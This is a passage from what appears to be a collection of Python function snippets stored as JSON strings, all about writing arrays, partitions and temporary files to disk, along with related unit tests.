subarray\n logger.partitioning(\" 1.1.2.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.1.2.3 Original subarray was in memory and\n # unique and there is enough memory to\n # keep the current subarray in memory\n logger.partitioning(\" 1.1.2.3 pass\")\n pass\n else:\n # config['readonly'] is False\n if originally_on_disk:\n if config.get(\"to_disk\", False):\n # 1.2.1.1 Original subarray was on disk and\n # there and we don't want to keep the\n # array\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # Original subarray was a temporary file\n # on disk which is not referenced by any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n logger.partitioning(\" 1.2.1.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.2.1.2 Original subarray was on disk but\n # there is not enough memory to keep\n # it\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # Original subarray was a temporary file\n # on disk which is not referenced by any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n logger.partitioning(\" 1.2.1.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.2.1.3 Original subarray was on disk and\n # there is enough memory to keep it\n logger.partitioning(\" 1.2.1.3 pass\")\n del self.masked\n else:\n if config.get(\"to_disk\", False):\n # 1.2.2.1 Original subarray was in memory but\n # we don't want to keep it\n logger.partitioning(\" 1.2.2.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.2.2.2 Original subarray was an in memory\n # but there is not enough memory to\n # keep it\n logger.partitioning(\" 1.2.2.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.2.2.3 Original subarray was in memory and\n # there is enough memory to keep it\n logger.partitioning(\" 1.2.2.3 del masked\")\n del self.masked\n else:\n logger.partitioning(\"Partition.close: parallel\")\n # --------------------------------------------------------\n # PARALLEL\n # --------------------------------------------------------\n pass\n\n # if hasattr(self, '_original'):\n # del self._original\n\n # print(hasattr(self, 'config')),\n try:\n del self.config\n except AttributeError:\n pass",
"def cleanup(job, tempOutputFileStoreID, outputFile, cores=1, memory=sortMemory, disk=\"3G\"):\n fileName = job.fileStore.readGlobalFile(tempOutputFileStoreID)\n shutil.copyfile(fileName, outputFile)\n job.fileStore.logToMaster(\"Finished copying sorted file to output: %s\" % outputFile)",
"def _register_temporary_file(self):\n _partition_file = self._subarray._partition_file\n _partition_dir = self._subarray._partition_dir\n if _partition_file not in _temporary_files:\n fd, _lock_file = mkstemp(\n prefix=_partition_file + \"_\", dir=_partition_dir\n )\n close(fd)\n _temporary_files[_partition_file] = (\n _partition_dir,\n _lock_file,\n set(),\n )\n else:\n _, _lock_file, _ = _temporary_files[_partition_file]\n\n return _lock_file",
"def save_partition(self, partition):\n raise NotImplementedError('save_file')",
"def _write_array_on_file(self, pa_array):\n pa_batch = pa.RecordBatch.from_struct_array(pa_array)\n self._num_bytes += pa_array.nbytes\n self.pa_writer.write_batch(pa_batch)",
"def quick_save_array(data, file_name, delimiter=',', ):\n data.tofile(file_name, sep=delimiter)",
"def save_tmp_file(self, data):\n with open(self.tmp_file, 'wb') as f:\n f.write(data)",
"def move_from_temp_directory(self):",
"def test_deleting_local_file_using_file_io_output_file() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n # Write to the temporary file\n file_location = os.path.join(tmpdirname, \"foo.txt\")\n with open(file_location, \"wb\") as f:\n f.write(b\"foo\")\n\n # Instantiate the file-io\n file_io = PyArrowFileIO()\n\n # Confirm that the file initially exists\n assert os.path.exists(file_location)\n\n # Instantiate the custom OutputFile\n output_file = PyArrowFileIO().new_output(location=f\"{file_location}\")\n\n # Delete the file using the file-io implementations delete method\n file_io.delete(output_file)\n\n # Confirm that the file no longer exists\n assert not os.path.exists(file_location)",
"def test_deleting_local_file_using_file_io() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n # Write to the temporary file\n output_file_location = os.path.join(tmpdirname, \"foo.txt\")\n with open(output_file_location, \"wb\") as f:\n f.write(b\"foo\")\n\n # Instantiate the file-io\n file_io = PyArrowFileIO()\n\n # Confirm that the file initially exists\n assert os.path.exists(output_file_location)\n\n # Delete the file using the file-io implementations delete method\n file_io.delete(output_file_location)\n\n # Confirm that the file no longer exists\n assert not os.path.exists(output_file_location)",
"def write_prep_arr(self, arr, index=None):\n if index is None:\n prep_data_dir = os.path.join(self.experiment_dir, 'prep')\n else:\n prep_data_dir = os.path.join(self.experiment_dir, *('scan_' + str(index), 'prep'))\n data_file = os.path.join(prep_data_dir, 'prep_data.tif')\n if not os.path.exists(prep_data_dir):\n os.makedirs(prep_data_dir)\n arr = self.detector.clear_seam(arr, self.roi)\n ut.save_tif(arr, data_file)",
"def test_save_npy(temp_dir):\n data = np.array([[1, 2, 3], [4, 5, 6]])\n save_npy(temp_dir, data, step=1)\n\n assert os.path.exists(os.path.join(temp_dir, \"npy\", \"1.npy\"))",
"def test_to_file(self):\n with TemporaryDirectory() as tmp:\n df_test = make_simple_dataframe()\n Base = BaseDataClass.from_object(df_test)\n fp_save = os.path.join(tmp, \"test_save.csv\")\n Base.to_file(fp_save)\n assert os.path.exists(fp_save)",
"def ArraytoFile(_array):\n\tfile = open('sort1.txt', 'w')\n\tfor line in _array:\n\t\tfile.write(line+\"\\n\")\n\tfile.close()",
"def write_to_disk(self):\n\n\t\t# print \"--------------------------------------------------------WRITING PIECE %r TO DISK\" %self.index\n\t\ttry:\n\t\t\tos.makedirs(PATH)\n\t\texcept:\n\t\t\tpass\n\t\tself.piece_file_name = os.path.join(PATH, self.torrent.name+'.'+'00'+str(self.index))\n\t\t# print \"Saving piece to file name: \", self.piece_file_name\n\t\tpiece_file = open(self.piece_file_name, 'w')\n\t\tpiece_file.write(self.data)\n\t\tpiece_file.close()",
"def write_part_to_file(self, uid, part):\n filename = part.get_filename()\n filename = os.path.join(self.tmp_dir, os.path.basename(filename))\n try:\n open(filename, 'wb').write(part.get_payload(decode=True))\n except Exception as e:\n raise Exception(\n \"Error writing to filename %s with exception %s\" %\n (filename, str(e)))\n else:\n self.helper.log_debug(\n 'write_part_to_file: saved file %s from uid %s' %\n (filename, uid))\n return filename",
"def toFile(self,fid):\n stack = []\n for w,b in self.stack:\n w.copy_to_host()\n b.copy_to_host()\n stack.append([w.numpy_array,b.numpy_array])\n\tpickle.dump(stack,fid)",
"def write_to_outfile(involume, outvolume, data, outfiles_partition, outdir_path, O, file_manager, addition, tracker):\n lowcorner, upcorner = get_overlap_subarray(involume, outvolume) # find subarray crossing both files in the basis of the original image\n overlap_vol = get_overlap_volume(involume, outvolume)\n overlap_shape = overlap_vol.get_shape()\n if DONT_WRITE:\n tracker.add_volume(overlap_vol)\n\n nb_outfile_seeks_tmp = 0\n s = overlap_shape\n if s[2] != O[2]:\n nb_outfile_seeks_tmp += s[0]*s[1]\n elif s[1] != O[1]:\n nb_outfile_seeks_tmp += s[0]\n elif s[0] != O[0]:\n nb_outfile_seeks_tmp += 1\n else:\n pass\n\n if DONT_WRITE:\n print(f\"Overlap shape: {overlap_shape}\")\n print(f\"Outfile shape: {O}\")\n print(f\"Number seeks: {nb_outfile_seeks_tmp}\")\n return overlap_shape, 0, nb_outfile_seeks_tmp\n\n slices = [(lowcorner[0], upcorner[0]), (lowcorner[1], upcorner[1]), (lowcorner[2], upcorner[2])]\n offset_in = involume.get_corners()[0] # lower corner\n offset_out = outvolume.get_corners()[0]\n\n slices_in_infile = [ # convert corners in the basis of input file\n (lowcorner[0]-offset_in[0], upcorner[0]-offset_in[0]), \n (lowcorner[1]-offset_in[1], upcorner[1]-offset_in[1]), \n (lowcorner[2]-offset_in[2], upcorner[2]-offset_in[2])]\n \n slices_in_outfile = [ # convert corners in the basis of output file\n (lowcorner[0]-offset_out[0], upcorner[0]-offset_out[0]), \n (lowcorner[1]-offset_out[1], upcorner[1]-offset_out[1]), \n (lowcorner[2]-offset_out[2], upcorner[2]-offset_out[2])]\n\n if DEBUG_LOCAL:\n logger.debug(f\"[debug] extracting {s[0][0]}:{s[0][1]}, {s[1][0]}:{s[1][1]}, {s[2][0]}:{s[2][1]} from input file\")\n logger.debug(f\"[debug] inserting {s2[0][0]}:{s2[0][1]}, {s2[1][0]}:{s2[1][1]}, {s2[2][0]}:{s2[2][1]} into output file {out_filename}\")\n\n s = slices_in_infile\n subarr_data = data[s[0][0]:s[0][1],s[1][0]:s[1][1],s[2][0]:s[2][1]] # extract subarr from input file's data \n\n _3d_pos = numeric_to_3d_pos(outvolume.index, outfiles_partition, order='C')\n i, j, k = _3d_pos\n\n if addition:\n subarr_data = subarr_data + 1\n\n global outdirs_dict, outdir_index\n\n if (i, j, k) in outdirs_dict.keys():\n outdir_path = outdirs_dict[(i, j, k)]\n print(f\"Writing at: {outdir_path}\")\n else:\n outdir_path = '/disk' + str(outdir_index) + '/gtimothee/output'\n outdirs_dict[(i, j, k)] = outdir_path\n outdir_index += 1\n if outdir_index == 6:\n outdir_index = 0\n\n print(f\"Writing at: {outdir_path}\")\n print(f\"Increasing writing index: {outdir_index}\")\n\n t2 = time.time()\n if not DONT_WRITE:\n file_manager.write_data(i, j, k, outdir_path, subarr_data, slices_in_outfile, O)\n t2 = time.time() - t2\n \n if DEBUG_LOCAL: \n file_manager.test_write(outfile_path, slices_in_outfile, subarr_data)\n\n return overlap_shape, t2, nb_outfile_seeks_tmp",
"def save_data_to_disk(self):\n Omega_M = self.theta_fid[0]\n for key in self.data.keys():\n np.save(f'./preloaded_data/{Omega_M}_{self.delta_theta[0]}_{key}.npy', self.data[key])",
"def save(self):\n if self.hasChanged:\n filePath = self.path\n tempPath = filePath+'.tmp'\n fileDir = os.path.split(filePath)[0]\n if not os.path.exists(fileDir): os.makedirs(fileDir)\n cPickle.dump(self.data,open(tempPath,'w'))\n renameFile(tempPath,filePath,True)\n self.hasChanged = False",
"def temp_split(filename):\n filename, ext = filename.rsplit('.')\n data = np.load(filename + \".\" + ext)\n # define basic constants from parent\n A = data['a']\n A_SIZE = A.shape[0]\n A_SHAPE = A.shape\n ORIGINAL_SIZE = data['original_size']\n B = data['b']\n # basics\n ki, kj, m = np.sum(A, 1), np.sum(A, 0), np.sum(np.sum(A, 1))\n # eval & evec\n eval, evec = linalg.eigh(B)\n # split\n g1_order, g1_arrays, g2_order, g2_arrays = create_g(A, evec)\n g1, g2 = create_g_matrix(g1_order, g1_arrays), create_g_matrix(g2_order, g2_arrays)\n # threshold (q)\n q1 = create_q(A_SIZE, B, g1_order, m)\n q2 = create_q(A_SIZE, B, g2_order, m)\n # B of G\n b1 = create_b_of_g(B, g1_order)\n b2 = create_b_of_g(B, g2_order)\n # a_elems\n a1_elems = []\n a2_elems = []\n original_elems = data['a_elems']\n for i in g1_order:\n a1_elems.append(original_elems[i])\n for i in g2_order:\n a2_elems.append(original_elems[i])\n return Part(filename + ',1', ext, q1, g1.shape[0], ','.join([str(x) for x in a1_elems])), \\\n Part(filename + ',2', ext, q2, g2.shape[0], ','.join([str(x) for x in a2_elems]))",
"def update_flat_file(array, flat_file):\n\n logger.info('Updating filespace flat files') \n\n pg_system_fs_entries = GetFilespaceEntriesDict(GetFilespaceEntries(array, PG_SYSTEM_FILESPACE).run()).run() \n \n flat_file_location = os.path.join(pg_system_fs_entries[1][2], flat_file) \n \n if not os.path.exists(flat_file_location):\n return\n\n logger.debug('flat file location for transaction files = %s' % flat_file_location)\n #Copy over the updated flat file to the standby\n with open(flat_file_location) as read_file:\n lines_to_write = ''\n for line in read_file:\n tokens = line.split()\n if len(tokens) != 2:\n lines_to_write += line\n elif tokens[0] == '1':\n lines_to_write += line\n\n temp_flat_file = os.path.join(flat_file_location + '.tmp')\n \n try:\n with open(temp_flat_file, 'w') as write_file:\n write_file.write(lines_to_write)\n \n #Rewrite the master flat file to include the standby information \n shutil.move(temp_flat_file, flat_file_location)\n except Exception, e:\n raise Exception('Failed to update flat file')",
"def writePosFilesStep(self): \n \n writeSetOfCoordinates(self._getExtraPath(), self.inputCoordinatesTiltedPairs.get().getUntilted())\n \n writeSetOfCoordinates(self._getExtraPath(), self.inputCoordinatesTiltedPairs.get().getTilted())",
"def rotate_file(cls, main_dir, temp_dir):\n\t\tif(os.path.isfile(main_dir)):\n\t\t\tos.remove(main_dir)\n\t\tcopyfile(temp_dir, main_dir)\n\t\tos.remove(temp_dir)",
"def save_data(self, f): \n if not self.sampling:\n self.convert_to_array()\n np.save(f, self.reads)",
"def dump(self, step=None):\n if self._compressed:\n np.savez_compressed(self._file_path, **self._data)\n else:\n np.savez(self._file_path, **self._data)",
"def __del__(self):\n # subarray = getattr(self, '_subarray', None)\n subarray = self._subarray\n\n # If the subarray is unique it will have 2 references to\n # it plus 1 within this method, making 3. If it has more\n # than 3 references to it then it is not unique.\n if getrefcount is not None:\n self._decrement_file_counter()\n if subarray is None or getrefcount(subarray) > 3:\n return\n else:\n # getrefcount has itself been deleted or is in the process\n # of being torn down\n return\n\n _partition_file = getattr(subarray, \"_partition_file\", None)\n if _partition_file is not None:\n # This partition contains a temporary file which is not\n # referenced by any other partition on this process, so if\n # there are no lock files present remove the file from\n # disk.\n _remove_temporary_files(_partition_file)\n\n else:\n try:\n if FileArray is not None and isinstance(subarray, FileArray):\n try:\n filename = subarray.get_filename()\n except Exception:\n filename = None\n\n if self.file_counter.get(filename, 999) <= 0:\n # This partition contains a non-temporary file\n # which is not referenced by any other\n # partitions, so close the file.\n subarray.close()\n except Exception:\n # If we're here then it is likely that FileArray has been\n # torn down, so just do nothing.\n pass\n # --- End: if",
"def dump_trjqueue(self,replica):\n\t\n\t# write coords and enes to the workspace, by_temp and by_replica\n rep = replica.repnum\n\t\n\t### WORKSPACE FILES ###\n\tfor pt in range(0,len(self.trjqueue[rep])):\n\n\t self.repfiles_trj[rep].write(repr(self.trjqueue[rep][pt]))\n\t self.repfiles_trj[rep].write('\\n')\n\n\t### BY_TEMP and BY_REPLICA FILES ###\n realrep = replica.mc.tempfromrep\n\t\n\tself.byreplica_temp[rep].write(str(rep))\n\tself.byreplica_temp[rep].write('\\n')\n\n\tself.bytemp_replica[rep].write(str(realrep))\n\tself.bytemp_replica[rep].write('\\n')\n\n\tfor pt in range(0,len(self.trjqueue[realrep])):\n\t self.bytemp_trj[rep].write(repr(self.trjqueue[realrep][pt]))\n\t self.bytemp_trj[rep].write('\\n')\n\n\tfor pt in range(0,len(self.trjqueue[rep])):\n\t self.byreplica_trj[rep].write(repr(self.trjqueue[rep][pt]))\n\t self.byreplica_trj[rep].write('\\n')\n\n ### clear the trj and ene queues\n self.trjqueue[rep] = []",
"def take_snapshot(self):\r\n self.snapshot = self.name, self.size, copy.copy(self.cells)\r\n self.bucket_array.take_snapshot()",
"def save_array(array, filename):\n np.save(filename, array)",
"def save_numpy_array(self):\n np.save(\"smallest_particles.npy\", self.smallest_particles)\n np.save(\"number_counts.npy\", self.number_counts)\n np.save(\"number_counts_2.npy\", self.number_counts_2)",
"def delete_piece_files(self):\n\n\t\tprint \"Removing piece files and cleaning up...\"\n\t\tpieces_dir = os.path.join(PATH, 'Pieces')\n\t\ttry:\n\t\t\tos.makedirs(pieces_dir)\n\t\texcept:\n\t\t\tpass\n\t\tfor i in range(self.torrent.no_of_subpieces):\n\t\t\tpiece_src = os.path.join(PATH, self.torrent.name+'.'+'00'+str(i))\n\t\t\tpiece_dest = os.path.join(pieces_dir, self.torrent.name+'.'+'00'+str(i))\n\t\t\tshutil.move(piece_src, piece_dest)\n\t\t\t# Or I just delete them:\n\t\t\t# os.remove(piece_src)",
"def save_subpath(self, index, result_path='', subPath=''):\n pass",
"def saveto(file, tmpfile):\n args = {\"file\": file, \"tmpfile\": tmpfile}\n send_command(\"saveto\", args)",
"def write_sorting(sorting, save_path):\n assert HAVE_SBEX, SHYBRIDSortingExtractor.installation_mesg\n dump = np.empty((0, 2))\n\n for unit_id in sorting.get_unit_ids():\n spikes = sorting.get_unit_spike_train(unit_id)[:, np.newaxis]\n expanded_id = (np.ones(spikes.size) * unit_id)[:, np.newaxis]\n tmp_concat = np.concatenate((expanded_id, spikes), axis=1)\n\n dump = np.concatenate((dump, tmp_concat), axis=0)\n\n sorting_fn = os.path.join(save_path, 'initial_sorting.csv')\n np.savetxt(sorting_fn, dump, delimiter=',', fmt='%i')",
"def join_chunks(self):\n if self.state == self.STATE_UPLOADING and self.total_chunks_uploaded == self.total_chunks:\n\n # create file and write chunks in the right order\n temp_file = open(self.full_path, \"wb\")\n for chunk in self.chunks.all():\n chunk_bytes = chunk.file.read()\n temp_file.write(chunk_bytes)\n temp_file.close()\n\n # set state as completed\n self.state = self.STATE_COMPLETED\n super(FlowFile, self).save()\n\n # delete chunks automatically if is activated in settings\n if FLOWJS_AUTO_DELETE_CHUNKS:\n self.chunks.all().delete()",
"def delete_partition(self, partition):\n raise NotImplementedError('delete_file')",
"def single_file_write(self, file_pointer, filename):\n temp_file = \"resources/temp_file\"\n\n file_pointer.seek(0)\n with open(temp_file, \"wb\") as output_file:\n shutil.copyfileobj(file_pointer, output_file)\n\n os.rename(temp_file, filename)\n log.info(\"Saved file: %s\", filename)",
"def set_temp_file(self):\n\n index = self.filename.rfind('/') + 1\n self.temp_filename = self.filename[:index] + \"tmp_\" + self.filename[index:]",
"def save_to_array(arr_name, arr_object):\n return np.save(arr_name, arr_object)",
"def write_csv_file(array, filename):\n\tnp.savetxt(filename, array, delimiter=\",\")",
"def file_close(self):\n if self.on_disk:\n self._subarray.close()",
"def write_subscriptions_to_tmp(self, subscriptions):\n with open(SUBSCRIPTIONS_FP, 'w') as data_file:\n json.dump(subscriptions, data_file, cls=EventerJSONEncoder)",
"def pytorch_save_atomic(data, filepath):\n\tfilepath = Path(filepath)\n\tfilepath_tmp = filepath.with_suffix('.tmp')\n\ttorch.save(data, filepath_tmp)\n\tshutil.move(filepath_tmp, filepath)",
"def split_data(raw_data, output_pref):\n train_data = output_pref + \".train\"\n test_data = output_pref + \".test\"\n random.shuffle(raw_data)\n with open(train_data, \"w\", encoding=\"utf8\") as fw1:\n with open(test_data, \"w\", encoding=\"utf8\") as fw2:\n with open(train_data + \".raw\", \"w\", encoding=\"utf8\") as fw3:\n with open(test_data + \".raw\", \"w\", encoding=\"utf8\") as fw4:\n for idx, (line, item) in enumerate(raw_data):\n if idx < 1000:\n fw2.write(line + \"\\n\")\n fw4.write(\"\\t\".join([str(i) for i in item]) + \"\\n\")\n else:\n fw1.write(line + \"\\n\")\n fw3.write(\"\\t\".join([str(i) for i in item]) + \"\\n\")",
"def _write_intermediate_results(storm_object_table, temp_file_name):\n\n file_system_utils.mkdir_recursive_if_necessary(file_name=temp_file_name)\n\n pickle_file_handle = open(temp_file_name, 'wb')\n pickle.dump(storm_object_table[INTERMEDIATE_COLUMNS], pickle_file_handle)\n pickle_file_handle.close()",
"def down(job, inputFileStoreID, N, downCheckpoints, memory=sortMemory):\n #Read the file\n inputFile = job.fileStore.readGlobalFile(inputFileStoreID, cache=False)\n length = os.path.getsize(inputFile)\n if length > N:\n #We will subdivide the file\n job.fileStore.logToMaster( \"Splitting file: %s of size: %s\"\n % (inputFileStoreID, length), level=logging.CRITICAL )\n #Split the file into two copies\n midPoint = getMidPoint(inputFile, 0, length)\n t1 = job.fileStore.getLocalTempFile()\n with open(t1, 'w') as fH:\n copySubRangeOfFile(inputFile, 0, midPoint+1, fH)\n t2 = job.fileStore.getLocalTempFile()\n with open(t2, 'w') as fH:\n copySubRangeOfFile(inputFile, midPoint+1, length, fH)\n #Call down recursively\n return job.addFollowOnJobFn(up,\n job.addChildJobFn(down, job.fileStore.writeGlobalFile(t1), N, \n downCheckpoints, checkpoint=downCheckpoints, memory=sortMemory).rv(),\n job.addChildJobFn(down, job.fileStore.writeGlobalFile(t2), N, \n downCheckpoints, checkpoint=downCheckpoints, memory=sortMemory).rv()).rv() \n else:\n #We can sort this bit of the file\n job.fileStore.logToMaster( \"Sorting file: %s of size: %s\"\n % (inputFileStoreID, length), level=logging.CRITICAL )\n #Sort the copy and write back to the fileStore\n shutil.copyfile(inputFile, inputFile + '.sort')\n sort(inputFile + '.sort')\n return job.fileStore.writeGlobalFile(inputFile + '.sort')",
"def test_custom_local_output_file() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n file_location = os.path.join(tmpdirname, \"foo.txt\")\n\n # Instantiate the output file\n absolute_file_location = os.path.abspath(file_location)\n output_file = PyArrowFileIO().new_output(location=f\"{absolute_file_location}\")\n\n # Create the output file and write to it\n f = output_file.create()\n f.write(b\"foo\")\n\n # Confirm that bytes were written\n with open(file_location, \"rb\") as f:\n assert f.read() == b\"foo\"\n\n assert len(output_file) == 3",
"def eeg_writeavr(array,tsb,di,file):\t\t\n import shutil as shu\n f=open(file,'w')\n firstline = 'Npts= %i TSB= %i DI= %7.5f SB= %7.5f SC= %i NChan= %i\\n' %(array.shape[1],tsb,di,1,200,array.shape[0]) \n chnam = 'Cz FP1 FP2 F3 F4 C3 C4 P3 P4 O1 O2 F7 F8 T7 T8 P7 P8 Fz Pz FC1 FC2 CP1 CP2 FC5 FC6 CP5 CP6 FT9 FT10 TP9 TP10 PO9 PO10\\n'\n f.write(firstline)\n f.write(chnam)\n for i in range(array.shape[0]):\n tmp = array[i,:]\n f.write(('%7.5f ' * len(tmp)) %tuple(tmp))\n f.write('\\n')\n \n f.close()\n #may want to change this on different machines...\n src = '/Users/crislanting/Projects/EEG/data/33.elp'\n dest = file[:-4] + '.elp'\n shu.copyfile(src,dest)",
"def _copy(self):\n for d in self._current_chunk:\n self.out.write(d)",
"def _flush_write_buffer(self):\n if self._buffer_file_size:\n self._write_counter += 1\n self.file.seek(0)\n self._multipart.upload_part_from_file(\n self.file,\n self._write_counter,\n headers=self._storage.headers\n )\n self.file.close()\n self.file = None",
"def moveNewFragmentsToTmpDir(options,nextTaskNum):\n for i in range(1,nextTaskNum):\n frag = getFragmentPath(options.tmpDir, options.fragBase, i)\n newfrag = getFragmentPath(\"%s%stmp\" % (options.tmpDir, os.sep), options.fragBase, i)\n os.rename(newfrag,frag)\n os.rmdir(\"%s%stmp\" % (options.tmpDir, os.sep))",
"def save(self, filename):\n np.savez(temp_dir + '/' + filename + '.npz', chip_ids=self.chip_ids, core_ids=self.core_ids, cx_ids=self.cx_ids)",
"def save_elem_file(self, output):\n with open(output, 'wb') as fid:\n self._write_elem_header(fid)\n self._write_nodes(fid)\n self._write_elements(fid)\n self._write_neighbors(fid)",
"def write_temp_file_to_path(suffix, content, file_path):\n temp_file = NamedTemporaryFile(suffix=suffix)\n temp_file.write(content)\n temp_file.seek(0)\n export_filename = default_storage.save(file_path, File(temp_file, file_path))\n temp_file.close()\n\n return export_filename",
"def test_output_file_to_input_file() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n output_file_location = os.path.join(tmpdirname, \"foo.txt\")\n\n # Create an output file instance\n output_file = PyArrowFileIO().new_output(location=f\"{output_file_location}\")\n\n # Create the output file and write to it\n with output_file.create() as output_stream:\n output_stream.write(b\"foo\")\n\n # Convert to an input file and confirm the contents\n input_file = output_file.to_input_file()\n with input_file.open() as f:\n assert f.read() == b\"foo\"",
"def print_to_file(arr, fid, sep=\"\", format=\"%s\"):\n\n f = array_create.array(arr, bohrium=False)\n return f.tofile(fid, sep=sep, format=format)",
"def _clear_temp_results(self):\n with open(self._filename, \"w\") as f_out:\n f_out.write(self._delimiter.join(self._get_fields()))\n f_out.write(\"\\n\")",
"def createTempoArray():\r\n file2write.write(\"int tempi[] = {\")\r\n\r\n for t in tempi: #iterates through tempi-array and filles the array with elements\r\n if t > 40:\r\n file2write.write(str(t))\r\n file2write.write(\",\")\r\n file2write.write(\"};\\n\\n\")",
"def array2chomp( arr, savename ):\n rows = map( lambda x: str(x)+'\\n', map( tuple, iter( arr ) ) ) \n with open( savename, 'w' ) as fh:\n fh.writelines( rows )",
"def save(self, filename):\n np.savez(temp_dir + '/' + filename + '.npz', core_ids=self.core_ids, cx_ids=self.cx_ids)",
"def adapt_array(self,array):\n import io\n import array,numpy\n out = io.BytesIO()\n numpy.save(out, array)\n out.seek(0)\n \n return out.read()",
"def _save_to_file(filename, data, start=0, header_size=None):\n if header_size is None:\n header_size = 0\n item_dtype = data.dtype\n # Open file as necessary\n opened = False\n if isinstance(filename, str):\n fd = open(filename, 'rb+')\n opened = True\n else:\n fd = filename\n # Seek to halo location and write\n offset = header_size + (start * item_dtype.itemsize)\n fd.seek(offset, os.SEEK_SET)\n data.tofile(fd)\n if opened:\n fd.close()",
"def test_deleting_local_file_using_file_io_input_file() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n # Write to the temporary file\n file_location = os.path.join(tmpdirname, \"foo.txt\")\n with open(file_location, \"wb\") as f:\n f.write(b\"foo\")\n\n # Instantiate the file-io\n file_io = PyArrowFileIO()\n\n # Confirm that the file initially exists\n assert os.path.exists(file_location)\n\n # Instantiate the custom InputFile\n input_file = PyArrowFileIO().new_input(location=f\"{file_location}\")\n\n # Delete the file using the file-io implementations delete method\n file_io.delete(input_file)\n\n # Confirm that the file no longer exists\n assert not os.path.exists(file_location)",
"def _create_temp_batch_file(self):\n return tempfile.NamedTemporaryFile(delete=False)",
"def write_files(self, basedir):\n outdir = basedir / self.type\n outdir.mkdir(parents=True, exist_ok=True)\n\n for point, row in zip(self.points, self.array):\n filepath = outdir / point\n with filepath.open('w') as f:\n idx = 0\n for ikey in self.pardict.keys():\n f.write(\"{} {}\\n\".format(ikey, row[idx]))\n idx += 1\n logging.debug('wrote %s', filepath)",
"def test_write_element(setup_teardown_file):\n f = setup_teardown_file[3]\n\n dt = np.dtype('(3,)f8')\n dset = f.create_dataset('x', (10,), dtype=dt)\n\n data = np.array([1, 2, 3.0])\n dset[4] = data\n\n out = dset[4]\n assert np.all(out == data)",
"def SavePartition(filepath, partition, sep=' '):\n def _com_to_string(com):\n \"\"\" helper function to string format node weights \"\"\"\n return sep.join([str(x) for x in com])\n\n # joining lines with line-breaks\n text = '\\n'.join([_com_to_string(com) for com in partition])\n\n # writing formatted matrix to file\n with open(filepath, 'w') as outfile:\n outfile.write(text)",
"def save(self, path_to_save):\n for item in self.data_array:\n item.save(path_to_save+item.file_name)",
"def write_table(self, df):\n (part_names, grouped_df, part_offsets,) = _get_groups_and_offsets(\n df=df,\n partition_cols=self.partition_cols,\n preserve_index=self.common_args[\"index\"],\n )\n fs = ioutils._ensure_filesystem(None, self.path, None)\n fs.mkdirs(self.path, exist_ok=True)\n\n full_paths = []\n metadata_file_paths = []\n full_offsets = [0]\n\n for idx, keys in enumerate(part_names.itertuples(index=False)):\n subdir = fs.sep.join(\n [\n f\"{name}={val}\"\n for name, val in zip(self.partition_cols, keys)\n ]\n )\n prefix = fs.sep.join([self.path, subdir])\n fs.mkdirs(prefix, exist_ok=True)\n current_offset = (part_offsets[idx], part_offsets[idx + 1])\n num_chunks = 1\n parts = 1\n\n if self.max_file_size is not None:\n # get the current partition\n start, end = current_offset\n sliced_df = grouped_df[start:end]\n\n current_file_size = _get_estimated_file_size(sliced_df)\n if current_file_size > self.max_file_size:\n # if the file is too large, compute metadata for\n # smaller chunks\n parts = math.ceil(current_file_size / self.max_file_size)\n new_offsets = list(\n range(start, end, int((end - start) / parts))\n )[1:]\n new_offsets.append(end)\n num_chunks = len(new_offsets)\n parts = len(new_offsets)\n full_offsets.extend(new_offsets)\n else:\n full_offsets.append(end)\n\n curr_file_num = 0\n num_chunks = 0\n while num_chunks < parts:\n new_file_name = f\"{self.filename}_{curr_file_num}.parquet\"\n new_full_path = fs.sep.join([prefix, new_file_name])\n\n # Check if the same `new_file_name` exists and\n # generate a `new_file_name`\n while new_full_path in self._file_sizes and (\n self._file_sizes[new_full_path]\n + (current_file_size / parts)\n ) > (self.max_file_size):\n curr_file_num += 1\n new_file_name = (\n f\"{self.filename}_{curr_file_num}.parquet\"\n )\n new_full_path = fs.sep.join([prefix, new_file_name])\n\n self._file_sizes[new_full_path] = self._file_sizes.get(\n new_full_path, 0\n ) + (current_file_size / parts)\n full_paths.append(new_full_path)\n metadata_file_paths.append(\n fs.sep.join([subdir, new_file_name])\n )\n num_chunks += 1\n curr_file_num += 1\n else:\n self.filename = self.filename or _generate_filename()\n full_path = fs.sep.join([prefix, self.filename])\n full_paths.append(full_path)\n metadata_file_paths.append(\n fs.sep.join([subdir, self.filename])\n )\n full_offsets.append(current_offset[1])\n\n paths, metadata_file_paths, offsets = (\n full_paths,\n metadata_file_paths,\n full_offsets,\n )\n existing_cw_batch = defaultdict(dict)\n new_cw_paths = []\n partition_info = [(i, j - i) for i, j in zip(offsets, offsets[1:])]\n\n for path, part_info, meta_path in zip(\n paths,\n partition_info,\n metadata_file_paths,\n ):\n if path in self.path_cw_map: # path is a currently open file\n cw_idx = self.path_cw_map[path]\n existing_cw_batch[cw_idx][path] = part_info\n else: # path not currently handled by any chunked writer\n new_cw_paths.append((path, part_info, meta_path))\n\n # Write out the parts of grouped_df currently handled by existing cw's\n for cw_idx, path_to_part_info_map in existing_cw_batch.items():\n cw = self._chunked_writers[cw_idx][0]\n # match found paths with this cw's paths and nullify partition info\n # for partition_col values not in this batch\n this_cw_part_info = [\n path_to_part_info_map.get(path, (0, 0))\n for path in self._chunked_writers[cw_idx][1]\n ]\n cw.write_table(grouped_df, this_cw_part_info)\n\n if new_cw_paths:\n # Create new cw for unhandled paths encountered in this write_table\n new_paths, part_info, meta_paths = zip(*new_cw_paths)\n self._chunked_writers.append(\n (\n ParquetWriter(new_paths, **self.common_args),\n new_paths,\n meta_paths,\n )\n )\n new_cw_idx = len(self._chunked_writers) - 1\n self.path_cw_map.update({k: new_cw_idx for k in new_paths})\n self._chunked_writers[-1][0].write_table(grouped_df, part_info)",
